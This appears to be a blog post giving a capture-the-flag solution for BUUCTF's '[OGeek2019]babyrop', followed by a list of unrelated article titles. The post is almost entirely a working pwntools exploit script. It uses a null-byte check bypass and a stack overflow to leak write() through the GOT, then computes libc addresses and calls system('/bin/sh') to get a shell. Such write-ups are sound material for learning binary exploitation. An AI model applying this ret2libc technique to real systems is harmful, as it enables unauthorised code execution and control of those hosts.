buuctf@[OGeek2019]babyrop
2024-09-05 13:29:32
#!/usr/bin/python #coding:utf-8 from pwn import * #context.log_level = 'debug' io = process('./pwn',env={"LD_PRELOAD":"./libc-2.23.so"}) #io = remote('node1.buuoj.cn', 28034) elf = ELF('./pwn') libc = ELF('./libc-2.23.so') def debug(): global io addr = raw_input("[+]debug:") gdb.attach(io, "b *"+addr) ''' puts_plt_addr = elf.plt['puts'] puts_got_addr = elf.got['puts'] ''' write_plt_addr = elf.plt['write'] write_got_addr = elf.got['write'] main_addr = 0x08048825 bin_sh_offset = 0x15902b # by libc-database payload = "\x00" payload += "\xff"*7 io.sendline(payload) io.recvuntil("Correct\n") offset = 0xE7 payload = 'A'*(offset+4) payload += p32(write_plt_addr) payload += p32(main_addr) payload += p32(1) payload += p32(write_got_addr) payload += p32(4) io.sendline(payload) data = io.recv(4) write_addr = u32(data) print "[+]write_addr:",hex(write_addr) libc_base_addr = write_addr - libc.symbols['write'] print "[+]libc_base_addr:",hex(libc_base_addr) system_addr = libc_base_addr + libc.symbols['system'] print "[+]system_addr:",hex(system_addr) bin_sh_addr = libc_base_addr + bin_sh_offset print "[+]bin_sh_addr:",hex(bin_sh_addr) payload = "\x00" payload += "\xff"*7 io.sendline(payload) io.recvuntil("Correct\n") payload = 'A'*(offset+4) payload += p32(system_addr) payload += 'AAAA' payload += p32(bin_sh_addr) #debug() #pause() io.sendline(payload) io.interactive()
最新文章
- SSH框架使用中存在的诡异异常
- sql统计重复数据
- 压缩UI深度的代码实现
- 利用DIV,实现简单的网页布局
- spring 源码之IOC 类图
- SQL Server 2008备份数据库失败,拒绝访问的原因
- Xposed 学习笔记
- MP4文件格式的解析
- 在Anacoda中管理多个版本Python
- MySQL InnoDB 修改表列Online DDL
- Java中方法定义和调用的学习
- Note for ";Some Remarks on Writing Mathematical Proofs";
- C++ 获取字符串中的所有汉字
- centos目录
- bzoj4176. Lucas的数论 杜教筛
- EF5+MVC4系列(9) Razor视图引擎的核心原理;@符号的使用;输出html的转义
- 内核线程和用户线程(SMP)
- 【洛谷 P2042】 [NOI2005]维护数列(自闭记第一期)
- [转]Spring Security学习总结二
- Linux基础命令-文件与目录